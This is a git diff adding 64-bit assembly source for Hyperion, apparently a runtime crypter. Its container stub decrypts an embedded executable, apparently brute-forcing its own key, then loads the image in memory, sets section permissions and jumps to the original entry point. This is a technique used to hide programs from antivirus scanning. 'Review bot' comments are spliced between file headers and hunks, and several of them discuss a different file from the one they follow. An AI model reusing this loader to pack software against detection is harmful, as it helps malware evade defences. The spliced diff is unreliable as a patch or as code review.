+ and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+ cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+ jne ssn_no_execute_read_write
+ mov rax,PAGE_EXECUTE_READWRITE
+ mov [section_flags],rax
+ jmp ssn_set_memory
+ssn_no_execute_read_write:
+ ;section execute/read?
+ mov ebx,[rdx+IMAGE_SECTION_HEADER.Characteristics]
+ and ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
+ cmp ebx,IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ
+ jne ssn_no_execute_read
+ mov rax,PAGE_EXECUTE_READ
+ mov [section_flags],rax
+ jmp ssn_set_memory
+ssn_no_execute_read:
+ ;section read/write?
+ mov ebx,[rdx+IMAGE_SECTION_HEADER.Characteristics]
+ and ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+ cmp ebx,IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
+ jne ssn_no_read_write
+ mov rax,PAGE_READWRITE
+ mov [section_flags],rax
+ jmp ssn_set_memory
+ssn_no_read_write:
+ ;section read?
+ mov ebx,[rdx+IMAGE_SECTION_HEADER.Characteristics]
+ and ebx,IMAGE_SCN_MEM_READ
+ cmp ebx,IMAGE_SCN_MEM_READ
+ jne ssn_no_read
+ mov rax,PAGE_READONLY
+ mov [section_flags],rax
+ jmp ssn_set_memory
+ssn_no_read:
+ mov rax,PAGE_NOACCESS
+ mov [section_flags],rax
+
+ ;set section permissions
+ssn_set_memory:
+ mov eax,[rdx+IMAGE_SECTION_HEADER.VirtualAddress]
+ add rax,[image_base]
+ mov ebx,[rdx+IMAGE_SECTION_HEADER.VirtualSize]
+ lea r12,[vprotect_ret]
+ invoke VirtualProtect,rax,rbx,[section_flags], r12
+ test rax,rax
+ jz ssn_exit_error
+
+ ;some output for the user
+ mov rdx,[section_header]
+ mov eax,[rdx+IMAGE_SECTION_HEADER.VirtualAddress]
+ add rax,[image_base]
+ writeRegisterToLog rax, ssn_exit_error
+
+ssn_exit_success:
+ mov rax,1
+ jmp ssn_exit_ret
+
+ssn_exit_error:
+ sub rax,rax
+
+ssn_exit_ret:
+ ret
+
+endp;
+
+;check MZ und PE signature and return start of the image file header
+proc verifyPE, image_base:QWORD
+
+ mov [image_base], rcx
+
+ mov rcx,[image_base]
+ mov ax,[rcx+IMAGE_DOS_HEADER.e_magic]
+ cmp ax,IMAGE_DOS_SIGNATURE
+ jne vpe_exit_error
+ mov eax,[rcx+IMAGE_DOS_HEADER.e_lfanew]
+ add rcx,rax
+ mov eax,dword [rcx]
+ cmp eax,IMAGE_NT_SIGNATURE
+ jne vpe_exit_error
+ add rcx,4
+
+vpe_exit_success:
+ mov rax,rcx
+ ret
+
+vpe_exit_error:
+ sub rax,rax
+ ret
+
+endp
+
+;First 4 bytes of data seciton contain a checksum
+;Verify that the checksum is correct
+;TODO: CHECKSUM SIZE is atm hardcoded
+proc verifyChecksum uses rbx rdi, section_address:QWORD, section_size:QWORD
+
+ mov [section_address],rcx
+ mov [section_size],rdx
+
+ mov rbx,[section_address]
+ mov eax,[rbx]
+ add rbx,4
+ mov rcx,[section_size]
+ sub rcx,4
+ ;checksum is in eax
+ ;pointer to file in ebx
+ ;size of file in ecx
+ sub rdi,rdi
+vs_calc_cs:
+ sub rdx,rdx
+ mov dl,byte [rbx]
+ add edi,edx
+ inc rbx
+ dec rcx
+ jnz vs_calc_cs
+ ;calculated checksum is in edi
+ cmp edi,eax
+ jne vs_exit_error
+
+vs_exit_success:
+ mov eax,1
+ jmp vs_exit_ret
+
+vs_exit_error:
+ sub eax,eax
+
+vs_exit_ret:
+ ret
+
+endp
diff --git a/binary/hyperion/source/Src/Container/64/logfile_disable.asm b/binary/hyperion/source/Src/Container/64/logfile_disable.asm
new file mode 100644
index 0000000..bad6210
--- /dev/null
+++ b/binary/hyperion/source/Src/Container/64/logfile_disable.asm
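Review bot: In loadImportTable the line `writeWithNewLine createStringFoundImportTable, str1, le_exit_error` names the error label of loadExecutable rather than this proc; on a logging failure it would jump into another procedure's epilogue, which neither restores the `uses rsi rdi rbx` registers nor unwinds this frame, so it should be `writeWithNewLine createStringFoundImportTable, str1, pit_exit_error`, matching the writeRegisterToLog that follows. verifyChecksum has no guard for section_size ≤ 4: after `sub rcx,4` the `dec rcx / jnz` loop runs with rcx zero or wrapped and reads far past the embedded image, so a `jbe vs_exit_error` right after `sub rcx,4` is needed. The proc comment should also say that the byte sum only detects corruption and offers no tamper protection, since anyone able to modify the embedded payload can recompute the four-byte sum. verifyPE likewise trusts e_lfanew without comparing it against the passed size, so a malformed header is dereferenced out of bounds before the signature compare.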
@@ -0,0 +1,114 @@
+macro createStringBruteforcing location
+{
+
+}
+
+macro createStringSettingPermissions location
+{
+
+}
+
+macro createStringOrdinal location
+{
+
+}
+
+macro createStringName location
+{
+
+}
+
+macro createStringProcessImportDirectory location
+{
+
+}
+
+macro createStringFoundImportTable location
+{
+
+}
+
+macro createStringLoadingFilesAPIs location
+{
+
+}
+
+macro createStringMappingFileInMemory location
+{
+
+}
+
+macro createStringLoaded location
+{
+
+}
+
+macro createStringLoadedPEHeader location
+{
+
+}
+
+macro createStringVerifyPE location
+{
+
+}
+
+macro createStringVerifyChecksum location
+{
+
+}
+
+macro createStringDone location
+{
+
+}
+
+macro createStringError location
+{
+
+}
+
+macro createStringStartingHyperion location
+{
+
+}
+
+macro createStringStartingHyperionLines location
+{
+
+}
+
+macro createStringLogTxt location
+{
+
+}
+
+;writes a string and a newline to the logfile
+macro writeWithNewLine char_sequence, char_buffer, error_exit{
+ char_sequence char_buffer
+
+}
+
+;write a string to the logfile
+macro writeLog content, exit_error{
+
+}
+
+;delete old log file and create a new one
+macro initLogFile exit_error{
+
+}
+
+;write a newline into logfile
+macro writeNewLineToLog exit_error{
+
+}
+
+;write a register value into logile
+macro writeRegisterToLog value, exit_error{
+
+}
+
+macro writeSectionNameAndAddressToLog{
+
+}
\ No newline at end of file
diff --git a/binary/hyperion/source/Src/Container/64/logfile_enable.asm b/binary/hyperion/source/Src/Container/64/logfile_enable.asm
new file mode 100644
index 0000000..28de8f1
--- /dev/null
+++ b/binary/hyperion/source/Src/Container/64/logfile_enable.asm
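Review bot: This stub file carries no header comment, unlike its 32-bit counterpart and logfile_enable.asm, and its contract is easy to break: the createString* macros here leave rax untouched where the enabled versions end with `lea rax,[location]`, and the write* macros expand to nothing, so callers shared with the logging build must never rely on a register value or an error exit produced by a logging macro. From what is visible in loadexecutable.asm the only consumer of that rax is another logging macro (`createStringName str1` followed by `writeLog rax, ...`), so the current code appears safe, but that invariant should be written down. I would add at the top: `;no-op stand-ins selected when logging is disabled: every macro must expand to nothing, clobber no register and never take its error exit, because the callers are shared with logfile_enable.asm`.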
@@ -0,0 +1,605 @@
+;-------------------------------------------
+;the content of this file is excluded, |
+;when the user disables logging features |
+;in hyperion command line. pls keep in mind |
+;and dont rely on its existence. |
+;-------------------------------------------
+
+;--- Begin Macro Section ---
+
+macro createStringBruteforcing location
+{
+ mov [location+0],'B'
+ mov [location+1],'r'
+ mov [location+2],'u'
+ mov [location+3],'t'
+ mov [location+4],'e'
+ mov [location+5],'f'
+ mov [location+6],'o'
+ mov [location+7],'r'
+ mov [location+8],'c'
+ mov [location+9],'i'
+ mov [location+10],'n'
+ mov [location+11],'g'
+ mov [location+12],' '
+ mov [location+13],'K'
+ mov [location+14],'e'
+ mov [location+15],'y'
+ mov [location+16],0
+ lea rax,[location]
+}
+
+macro createStringSettingPermissions location
+{
+ mov [location+0],'S'
+ mov [location+1],'e'
+ mov [location+2],'t'
+ mov [location+3],'t'
+ mov [location+4],'i'
+ mov [location+5],'n'
+ mov [location+6],'g'
+ mov [location+7],' '
+ mov [location+8],'S'
+ mov [location+9],'e'
+ mov [location+10],'c'
+ mov [location+11],'t'
+ mov [location+12],'i'
+ mov [location+13],'o'
+ mov [location+14],'n'
+ mov [location+15],' '
+ mov [location+16],'P'
+ mov [location+17],'e'
+ mov [location+18],'r'
+ mov [location+19],'m'
+ mov [location+20],'i'
+ mov [location+21],'s'
+ mov [location+22],'s'
+ mov [location+23],'i'
+ mov [location+24],'o'
+ mov [location+25],'n'
+ mov [location+26],'s'
+ mov [location+27],0
+ lea rax,[location]
+}
+
+macro createStringOrdinal location
+{
+ mov [location+0],'O'
+ mov [location+1],'r'
+ mov [location+2],'d'
+ mov [location+3],'i'
+ mov [location+4],'n'
+ mov [location+5],'a'
+ mov [location+6],'l'
+ mov [location+7],':'
+ mov [location+8],' '
+ mov [location+9],0
+ lea rax,[location]
+}
+
+macro createStringName location
+{
+ mov [location+0],'N'
+ mov [location+1],'a'
+ mov [location+2],'m'
+ mov [location+3],'e'
+ mov [location+4],':'
+ mov [location+5],' '
+ mov [location+6],0
+ lea rax,[location]
+}
+
+macro createStringProcessImportDirectory location
+{
+ mov [location+0],'P'
+ mov [location+1],'r'
+ mov [location+2],'o'
+ mov [location+3],'c'
+ mov [location+4],'e'
+ mov [location+5],'s'
+ mov [location+6],'s'
+ mov [location+7],'i'
+ mov [location+8],'n'
+ mov [location+9],'g'
+ mov [location+10],' '
+ mov [location+11],'I'
+ mov [location+12],'m'
+ mov [location+13],'p'
+ mov [location+14],'o'
+ mov [location+15],'r'
+ mov [location+16],'t'
+ mov [location+17],' '
+ mov [location+18],'D'
+ mov [location+19],'i'
+ mov [location+20],'r'
+ mov [location+21],'e'
+ mov [location+22],'c'
+ mov [location+23],'t'
+ mov [location+24],'o'
+ mov [location+25],'r'
+ mov [location+26],'y'
+ mov [location+27],':'
+ mov [location+28],0
+ lea rax,[location]
+}
+
+macro createStringFoundImportTable location
+{
+ mov [location+0],'I'
+ mov [location+1],'m'
+ mov [location+2],'p'
+ mov [location+3],'o'
+ mov [location+4],'r'
+ mov [location+5],'t'
+ mov [location+6],' '
+ mov [location+7],'T'
+ mov [location+8],'a'
+ mov [location+9],'b'
+ mov [location+10],'l'
+ mov [location+11],'e'
+ mov [location+12],':'
+ mov [location+13],0
+ lea rax,[location]
+}
+
+macro createStringLoadingFilesAPIs location
+{
+ mov [location+0],'L'
+ mov [location+1],'o'
+ mov [location+2],'a'
+ mov [location+3],'d'
+ mov [location+4],'i'
+ mov [location+5],'n'
+ mov [location+6],'g'
+ mov [location+7],' '
+ mov [location+8],'A'
+ mov [location+9],'P'
+ mov [location+10],'I'
+ mov [location+11],'s'
+ mov [location+12],0
+ lea rax,[location]
+}
+
+macro createStringMappingFileInMemory location
+{
+ mov [location+0],'M'
+ mov [location+1],'a'
+ mov [location+2],'p'
+ mov [location+3],'p'
+ mov [location+4],'i'
+ mov [location+5],'n'
+ mov [location+6],'g'
+ mov [location+7],' '
+ mov [location+8],'F'
+ mov [location+9],'i'
+ mov [location+10],'l'
+ mov [location+11],'e'
+ mov [location+12],' '
+ mov [location+13],'i'
+ mov [location+14],'n'
+ mov [location+15],'t'
+ mov [location+16],'o'
+ mov [location+17],' '
+ mov [location+18],'M'
+ mov [location+19],'e'
+ mov [location+20],'m'
+ mov [location+21],'o'
+ mov [location+22],'r'
+ mov [location+23],'y'
+ mov [location+24],0
+ lea rax,[location]
+}
+
+macro createStringLoaded location
+{
+ mov [location+0],'L'
+ mov [location+1],'o'
+ mov [location+2],'a'
+ mov [location+3],'d'
+ mov [location+4],'e'
+ mov [location+5],'d'
+ mov [location+6],' '
+ mov [location+7],0
+ lea rax,[location]
+}
+
+macro createStringLoadedPEHeader location
+{
+ mov [location+0],'S'
+ mov [location+1],'e'
+ mov [location+2],'t'
+ mov [location+3],' '
+ mov [location+4],'I'
+ mov [location+5],'m'
+ mov [location+6],'a'
+ mov [location+7],'g'
+ mov [location+8],'e'
+ mov [location+9],' '
+ mov [location+10],'w'
+ mov [location+11],'r'
+ mov [location+12],'i'
+ mov [location+13],'t'
+ mov [location+14],'a'
+ mov [location+15],'b'
+ mov [location+16],'l'
+ mov [location+17],'e'
+ mov [location+18],':'
+ mov [location+19],0
+ lea rax,[location]
+}
+
+macro createStringVerifyPE location
+{
+ mov [location+0],'V'
+ mov [location+1],'e'
+ mov [location+2],'r'
+ mov [location+3],'i'
+ mov [location+4],'f'
+ mov [location+5],'y'
+ mov [location+6],'i'
+ mov [location+7],'n'
+ mov [location+8],'g'
+ mov [location+9],' '
+ mov [location+10],'P'
+ mov [location+11],'E'
+ mov [location+12],0
+ lea rax,[location]
+}
+
+macro createStringVerifyChecksum location
+{
+ mov [location+0],'V'
+ mov [location+1],'e'
+ mov [location+2],'r'
+ mov [location+3],'i'
+ mov [location+4],'f'
+ mov [location+5],'y'
+ mov [location+6],'i'
+ mov [location+7],'n'
+ mov [location+8],'g'
+ mov [location+9],' '
+ mov [location+10],'C'
+ mov [location+11],'h'
+ mov [location+12],'e'
+ mov [location+13],'c'
+ mov [location+14],'k'
+ mov [location+15],'s'
+ mov [location+16],'u'
+ mov [location+17],'m'
+ mov [location+18],0
+ lea rax,[location]
+}
+
+macro createStringDone location
+{
+ mov [location+0],'D'
+ mov [location+1],'o'
+ mov [location+2],'n'
+ mov [location+3],'e'
+ mov [location+4],0
+ lea rax,[location]
+}
+
+macro createStringError location
+{
+ mov [location+0],'E'
+ mov [location+1],'r'
+ mov [location+2],'r'
+ mov [location+3],'o'
+ mov [location+4],'r'
+ mov [location+5],0
+ lea rax,[location]
+}
+
+macro createStringStartingHyperion location
+{
+ mov [location+00],'H'
+ mov [location+01],'y'
+ mov [location+02],'p'
+ mov [location+03],'e'
+ mov [location+04],'r'
+ mov [location+05],'i'
+ mov [location+06],'o'
+ mov [location+07],'n'
+ mov [location+08],' '
+ mov [location+09],'L'
+ mov [location+10],'o'
+ mov [location+11],'g'
+ mov [location+12],'f'
+ mov [location+13],'i'
+ mov [location+14],'l'
+ mov [location+15],'e'
+ mov [location+16],13
+ mov [location+17],10
+ mov [location+18],0
+ lea rax,[location]
+}
+
+macro createStringStartingHyperionLines location
+{
+ mov [location+00],'-'
+ mov [location+01],'-'
+ mov [location+02],'-'
+ mov [location+03],'-'
+ mov [location+04],'-'
+ mov [location+05],'-'
+ mov [location+06],'-'
+ mov [location+07],'-'
+ mov [location+08],'-'
+ mov [location+09],'-'
+ mov [location+10],'-'
+ mov [location+11],'-'
+ mov [location+12],'-'
+ mov [location+13],'-'
+ mov [location+14],'-'
+ mov [location+15],'-'
+ mov [location+16],13
+ mov [location+17],10
+ mov [location+18],0
+ lea rax,[location]
+}
+
+macro createStringLogTxt location
+{
+ mov [location+0],'l'
+ mov [location+1],'o'
+ mov [location+2],'g'
+ mov [location+3],'.'
+ mov [location+4],'t'
+ mov [location+5],'x'
+ mov [location+6],'t'
+ mov [location+7],0
+ lea rax,[location]
+}
+
+;writes a string and a newline to the logfile
+macro writeWithNewLine char_sequence, char_buffer, error_exit{
+ char_sequence char_buffer
+ lea rax,[str1]
+ fastcall writeLog_, rax
+ test rax,rax
+ jz error_exit
+ fastcall writeNewLineToLog_
+ test rax,rax
+ jz error_exit
+}
+
+;write a string to the logfile
+macro writeLog content, error_exit{
+ fastcall writeLog_, content
+ test rax,rax
+ jz error_exit
+}
+
+;delete old log file and create a new one
+macro initLogFile error_exit{
+ fastcall initLogFile_, error_exit
+ test rax,rax
+ jz error_exit
+}
+
+;write a newline into logfile
+macro writeNewLineToLog error_exit{
+ fastcall writeNewLineToLog_
+ test rax,rax
+ jz error_exit
+}
+
+;write a register value into logile
+macro writeRegisterToLog value, error_exit{
+ fastcall writeRegisterToLog_, value
+ test rax,rax
+ jz error_exit
+}
+
+;TODO: Does not really fit into architecture
+macro writeSectionNameAndAddressToLog{
+ lea rdi,[str1]
+ mov byte [rdi+8],0
+ mov rdx,[section_header]
+ lea rsi,[rdx+IMAGE_SECTION_HEADER._Name]
+ mov rcx,8
+ mov r12, rdi
+ rep movsb
+ mov rdi, r12
+ writeLog rdi, ls_exit_error
+ writeNewLineToLog ls_exit_error
+ mov rdx,[section_header]
+ mov eax,[rdx+IMAGE_SECTION_HEADER.VirtualAddress]
+ add rax,[image_base]
+ writeRegisterToLog rax, ls_exit_error
+}
+
+;--- End Macro Section ---
+
+;get the length of a string
+proc strlen_ uses rdi rcx, string_ptr:QWORD
+
+ mov [string_ptr],rcx
+
+ mov rdi,[string_ptr]
+ sub rcx, rcx
+ sub al, al
+ not rcx
+ cld
+ repne scasb
+ not rcx
+ dec rcx
+ mov rax,rcx
+
+ ret
+
+endp
+
+;write into log.txt
+;returns false if an eerror occurs
+proc writeLog_ content:QWORD
+
+local str1[256]:BYTE, oldlogsize:QWORD, newlogsize:QWORD, contentsize:QWORD,\
+ filehandle:QWORD, filemappingobject:QWORD, mapaddress:QWORD, retval:QWORD
+
+ mov [content],rcx
+
+ ;open file
+ createStringLogTxt str1
+ sub r11,r11
+ invoke CreateFile, rax, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ, r11, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, r11
+ mov [retval],rax
+ test rax,rax
+ jz wl_logexit
+ mov [filehandle],rax
+
+ ;get logfile size
+ invoke GetFileSize, qword [filehandle], 0
+ mov [oldlogsize],rax
+
+ ;get size of string for logfile for concatenation
+ fastcall strlen_, qword [content]
+ mov [contentsize], rax
+ add rax,qword [oldlogsize]
+ mov [newlogsize], rax
+
+ ;create the file mapping
+ sub r10,r10
+ invoke CreateFileMapping, qword [filehandle], r10, PAGE_READWRITE, r10, rax, r10
+ mov [retval],rax
+ test rax, rax
+ jz wl_closelogfile
+ mov [filemappingobject],rax
+
+ sub r10,r10
+ invoke MapViewOfFile, rax, FILE_MAP_ALL_ACCESS, r10, r10, qword [newlogsize]
+ mov [retval],rax
+ test rax, rax
+ jz wl_closemaphandle
+ mov [mapaddress],rax
+
+ ;copy string into map
+ add rax,[oldlogsize]
+ mov rdi,rax
+ mov rsi,[content]
+ mov rcx,[contentsize]
+ repz movsb
+ mov [retval],1
+
+wl_unmapfile:
+ invoke UnmapViewOfFile, qword [mapaddress]
+
+wl_closemaphandle:
+ invoke CloseHandle, qword [filemappingobject]
+
+wl_closelogfile:
+ invoke CloseHandle, qword [filehandle]
+
+wl_logexit:
+ mov rax,[retval]
+ ret;
+
+endp
+
+;adds a to the logfile
+;returns false if an error occurs
+proc writeNewLineToLog_
+
+local str1[3]:BYTE
+
+ lea rax,[str1]
+ mov byte [rax+0],13
+ mov byte [rax+1],10
+ mov byte [rax+2],0
+ fastcall writeLog_, rax
+ ret
+
+endp
+
+;returns false if an error occurs
+proc writeRegisterToLog_ Value:QWORD
+
+local str1[18]:BYTE, retval:QWORD
+ mov [Value],rcx
+
+ lea rax,[str1]
+ fastcall binToString_, rax, [Value]
+ fastcall writeLog_, rax
+ mov [retval],rax
+ test rax,rax
+ jz wrtl_exit
+ fastcall writeNewLineToLog_
+ mov [retval],rax
+ test rax,rax
+ jz wrtl_exit
+
+wrtl_exit:
+ mov rax,[retval]
+ ret
+
+endp
+
+;converts into an 8 byte string and stores it
+proc binToString_ buffer:QWORD, bin:QWORD
+ mov [buffer],rcx
+ mov [bin], rdx
+
+ mov r10,[bin]
+ mov rcx,16
+bts_next_byte:
+ mov rax,r10
+ and rax,0000000fh
+ cmp rax,9
+ jg bts_add_55
+bts_add_48:
+ add rax,48
+ jmp bts_store_bin
+bts_add_55:
+ add rax,55
+bts_store_bin:
+ dec rcx
+ mov rdx,[buffer]
+ mov byte [rcx+rdx],al
+ test rcx,rcx
+ jz bts_finished_conversion
+ shr r10,4
+ jmp bts_next_byte
+
+bts_finished_conversion:
+ mov rax,[buffer]
+ mov byte [rax+16],0
+ ret
+endp
+
+;Write initial message into logfile
+proc initLogFile_
+
+local str1[256]:BYTE
+
+ createStringLogTxt str1
+ invoke DeleteFile, rax
+
+ createStringStartingHyperionLines str1
+ fastcall writeLog_, rax
+ test rax,rax
+ jz ilf_exit_error
+
+ createStringStartingHyperion str1
+ fastcall writeLog_, rax
+ test rax,rax
+ jz ilf_exit_error
+
+ createStringStartingHyperionLines str1
+ fastcall writeLog_, rax
+ test rax,rax
+ jz ilf_exit_error
+
+ fastcall writeNewLineToLog_
+ test rax,rax
+ jz ilf_exit_error
+
+ilf_exit_success:
+ mov rax,1
+ ret
+
+ilf_exit_error:
+ sub rax,rax
+ ret
+
+endp
\ No newline at end of file
diff --git a/binary/hyperion/source/Src/Container/64/main.asm b/binary/hyperion/source/Src/Container/64/main.asm
new file mode 100644
index 0000000..1d0da63
--- /dev/null
+++ b/binary/hyperion/source/Src/Container/64/main.asm
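Review bot: `writeLog_` checks the `CreateFile` result with `test rax,rax / jz wl_logexit`, but CreateFile reports failure as INVALID_HANDLE_VALUE (-1), not NULL, so an unopenable `log.txt` falls through to `GetFileSize` with an invalid handle and the proc hands -1 back to callers, which every `writeLog` macro then treats as success; the check should be `cmp rax,INVALID_HANDLE_VALUE / je wl_logexit` with `retval` cleared before the jump. The `GetFileSize` result is stored unchecked as well, so INVALID_FILE_SIZE would become the mapping size on the next call. Separately, `writeWithNewLine` ignores its `char_buffer` argument and reloads `lea rax,[str1]` — the `createString…` macro it just expanded already leaves the address in `rax`, so the `lea` is redundant and wrong for any buffer other than `str1` — and `initLogFile` passes its `error_exit` label as a fastcall argument to `initLogFile_`, which declares no parameter. The two typos in the headers (`eerror`, `logile`) and the `ret;` with a stray semicolon are cosmetic but worth fixing in the same pass.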
@@ -0,0 +1,125 @@
+; Hyperion 64-Bit container.exe
+
+include 'image_base.inc'
+include 'main_prolog.inc' ;format PE64 ...
+entry start
+
+include '..\..\..\Fasm\INCLUDE\win64a.inc'
+include 'pe.inc'
+;automatically generated by hyperion cpp stub
+include 'key_size.inc'
+include 'infile_size.inc'
+include 'image_size.inc'
+;---
+
+SIZE_DATA_SECTION_NAME equ 5
+SIZE_CHECKSUM equ 4
+
+;this contains the decrypted and loaded executable
+section '.bss' data readable writeable
+
+ decrypted_infile: db IMAGE_SIZE dup (?)
+
+;--------------------------------------------------
+
+;this contains the encrypted exe
+section '.data' data readable writeable
+
+ encrypted_infile: include 'infile_array.inc'
+
+;--------------------------------------------------
+
+section '.text' code readable executable
+
+
+;automatically generated by hyperion cpp stub
+include 'logfile_select.asm'
+include 'decryption_payload.asm'
+;pe loader functions
+include 'loadexecutable.asm'
+
+;---
+
+start:
+ sub rsp,8
+ fastcall MainMethod
+ test rax,rax
+ jz the_end_my_friend
+ ;file was loaded, execute it
+ add rsp,8
+ jmp rax
+the_end_my_friend:
+ invoke ExitProcess,0
+
+proc MainMethod uses rbx
+ local str1[256]:BYTE
+
+ ;create logfile and write initial message into it
+ initLogFile main_exit
+
+ ;decrypt exe in data section
+ fastcall decryptExecutable, encrypted_infile
+ test rax,rax
+ jz main_exiterror
+
+ ;load the executable at its image base
+ ;(this will overwrite current MZ header and bss section)
+ fastcall loadExecutable, encrypted_infile
+ test rax,rax
+ jz main_exiterror
+
+ ;start program execution
+ mov rdx,IMAGE_BASE
+ xor rax,rax
+ mov eax,[rdx+IMAGE_DOS_HEADER.e_lfanew]
+ add rax,rdx
+ add rax,4
+ ;image file header now in eax
+ add rax,sizeof.IMAGE_FILE_HEADER
+ xor rdx,rdx
+ mov edx,[rax+IMAGE_OPTIONAL_HEADER64.AddressOfEntryPoint]
+ mov rax,IMAGE_BASE
+ add rdx,rax
+ ;entry point of original exe is now in rbx
+ mov rbx,rdx
+
+;finished without errors
+main_exitsuccess:
+ writeNewLineToLog main_exit
+ createStringDone str1
+ writeLog rax, main_exit
+ mov rax,rbx
+ jmp main_exit
+
+;finished with errors after logfile API loading
+main_exiterror:
+ writeNewLineToLog main_exit
+ createStringError str1
+ writeLog rax, main_exit
+ sub rax,rax
+
+main_exit:
+ ret
+
+endp
+
+;import table
+section '.idata' import data readable writeable
+
+ library kernel,'KERNEL32.DLL'
+
+ import kernel,\
+ LoadLibrary,'LoadLibraryA',\
+ GetProcAddress,'GetProcAddress',\
+ GetFileSize,'GetFileSize',\
+ CreateFileMapping,'CreateFileMappingA',\
+ MapViewOfFile,'MapViewOfFile',\
+ UnmapViewOfFile,'UnmapViewOfFile',\
+ CreateFile,'CreateFileA',\
+ CloseHandle,'CloseHandle',\
+ DeleteFile,'DeleteFileA',\
+ GetModuleHandle,'GetModuleHandle',\
+ VirtualAlloc,'VirtualAlloc',\
+ VirtualProtect,'VirtualProtect',\
+ VirtualFree,'VirtualFree',\
+ ExitProcess,'ExitProcess'
diff --git a/binary/hyperion/source/Src/Container/64/pe.inc b/binary/hyperion/source/Src/Container/64/pe.inc
new file mode 100644
index 0000000..433cde6
--- /dev/null
+++ b/binary/hyperion/source/Src/Container/64/pe.inc
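Review bot: The import table entry `GetModuleHandle,'GetModuleHandle'` names a symbol KERNEL32.DLL does not export — only the `GetModuleHandleA`/`GetModuleHandleW` (and `…Ex`) variants exist — so if anything in the included loader code references it, the import cannot be resolved when the container is loaded; the line should read `GetModuleHandle,'GetModuleHandleA',\` like the neighbouring `CreateFile` and `DeleteFile` entries. Whether the symbol is referenced at all is not visible from this file, since the fasm import macros omit unused names. The `.bss` buffer `decrypted_infile` is declared but never referenced here, while `loadExecutable` is handed `encrypted_infile` right after `decryptExecutable`, which presumably decrypts in place; the comment on the `.bss` section (`;this contains the decrypted and loaded executable`) should say which buffer actually holds the decrypted image, or the unused one should go. In `MainMethod` the `xor rax,rax` before `mov eax,[…e_lfanew]` (and the matching `xor rdx,rdx`) is redundant, since a 32-bit `mov` already zero-extends into the full register.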
@@ -0,0 +1,253 @@
+IMAGE_DOS_SIGNATURE = 05A4Dh
+IMAGE_OS2_SIGNATURE = 0454Eh
+IMAGE_OS2_SIGNATURE_LE = 0454Ch
+IMAGE_VXD_SIGNATURE = 0454Ch
+IMAGE_LX_SIGNATURE = 0584Ch
+IMAGE_NT_SIGNATURE = 04550h
+
+IMAGE_FILE_MACHINE_UNKNOWN = 0
+IMAGE_FILE_MACHINE_I386 = 014ch
+IMAGE_FILE_MACHINE_R3000 = 0162h
+IMAGE_FILE_MACHINE_R4000 = 0166h
+IMAGE_FILE_MACHINE_R10000 = 0168h
+IMAGE_FILE_MACHINE_WCEMIPSV2 = 0169h
+IMAGE_FILE_MACHINE_ALPHA = 0184h
+IMAGE_FILE_MACHINE_SH3 = 01a2h
+IMAGE_FILE_MACHINE_SH3DSP = 01a3h
+IMAGE_FILE_MACHINE_SH3E = 01a4h
+IMAGE_FILE_MACHINE_SH4 = 01a6h
+IMAGE_FILE_MACHINE_SH5 = 01a8h
+IMAGE_FILE_MACHINE_ARM = 01c0h
+IMAGE_FILE_MACHINE_THUMB = 01c2h
+IMAGE_FILE_MACHINE_AM33 = 01d3h
+IMAGE_FILE_MACHINE_POWERPC = 01F0h
+IMAGE_FILE_MACHINE_POWERPCFP = 01f1h
+IMAGE_FILE_MACHINE_IA64 = 0200h
+IMAGE_FILE_MACHINE_MIPS16 = 0266h
+IMAGE_FILE_MACHINE_ALPHA64 = 0284h
+IMAGE_FILE_MACHINE_MIPSFPU = 0366h
+IMAGE_FILE_MACHINE_MIPSFPU16 = 0466h
+IMAGE_FILE_MACHINE_AXP64 = IMAGE_FILE_MACHINE_ALPHA64
+IMAGE_FILE_MACHINE_TRICORE = 0520h
+IMAGE_FILE_MACHINE_CEF = 0CEFh
+IMAGE_FILE_MACHINE_EBC = 0EBCh
+IMAGE_FILE_MACHINE_AMD64 = 8664h
+IMAGE_FILE_MACHINE_M32R = 9041h
+IMAGE_FILE_MACHINE_CEE = 0C0EEh
+
+IMAGE_SIZEOF_NT_OPTIONAL32_HEADER = 224
+IMAGE_NT_OPTIONAL_HDR32_MAGIC = 10bh
+
+IMAGE_FILE_RELOCS_STRIPPED = 0001h
+IMAGE_FILE_EXECUTABLE_IMAGE = 0002h
+IMAGE_FILE_LINE_NUMS_STRIPPED = 0004h
+IMAGE_FILE_LOCAL_SYMS_STRIPPED = 0008h
+IMAGE_FILE_AGGRESIVE_WS_TRIM = 0010h
+IMAGE_FILE_LARGE_ADDRESS_AWARE = 0020h
+IMAGE_FILE_BYTES_REVERSED_LO = 0080h
+IMAGE_FILE_32BIT_MACHINE = 0100h
+IMAGE_FILE_DEBUG_STRIPPED = 0200h
+IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP = 0400h
+IMAGE_FILE_NET_RUN_FROM_SWAP = 0800h
+IMAGE_FILE_SYSTEM = 1000h
+IMAGE_FILE_DLL = 2000h
+IMAGE_FILE_UP_SYSTEM_ONLY = 4000h
+IMAGE_FILE_BYTES_REVERSED_HI = 8000h
+
+IMAGE_SUBSYSTEM_UNKNOWN = 0
+IMAGE_SUBSYSTEM_NATIVE = 1
+IMAGE_SUBSYSTEM_WINDOWS_GUI = 2
+IMAGE_SUBSYSTEM_WINDOWS_CUI = 3
+IMAGE_SUBSYSTEM_OS2_CUI = 5
+IMAGE_SUBSYSTEM_POSIX_CUI = 7
+IMAGE_SUBSYSTEM_NATIVE_WINDOWS = 8
+IMAGE_SUBSYSTEM_WINDOWS_CE_GUI = 9
+IMAGE_SUBSYSTEM_EFI_APPLICATION = 10
+IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER = 11
+IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER = 12
+IMAGE_SUBSYSTEM_EFI_ROM = 13
+IMAGE_SUBSYSTEM_XBOX = 14
+IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION = 16
+
+IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0040h
+IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY = 0080h
+IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0100h
